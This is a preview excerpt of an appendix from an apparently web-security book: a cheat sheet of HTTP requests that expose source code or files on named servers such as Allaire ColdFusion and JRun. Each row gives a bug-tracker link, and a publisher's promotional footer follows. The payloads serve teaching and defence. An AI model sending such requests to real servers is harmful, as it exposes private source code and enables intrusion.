Appendix D. Source Code, File, and Directory Disclosure Cheat Sheet
This appendix contains a list of all the major source code disclosure techniques discovered over the years. Many of them are specific to particular bugs in particular versions of software. Others are generic across platforms and have been known to reappear contrary to what the vendors say.
Table D-1. Source Code, File, and Directory Disclosure Cheat Sheet
| Vulnerable Application | HTTP Request | Vulnerability Information |
|---|---|---|
| Allaire ColdFusion | GET /CFDOCS/snippets/viewexample.cfm?viewexample.cfm Tagname=<relative path to CFM file> HTTP/1.0 | http://www.securityfocus.com/bid/115 |
| Allaire JRun Alternative Data Stream | GET /file.jsp::$DATA HTTP/1.0 | http://www.securityfocus.com/bid/3664 |
| Allaire ... |
Get Web Hacking: Attacks and Defense now with the O’Reilly learning platform.
O’Reilly members experience books, live events, courses curated by job role, and more from O’Reilly and nearly 200 top publishers.
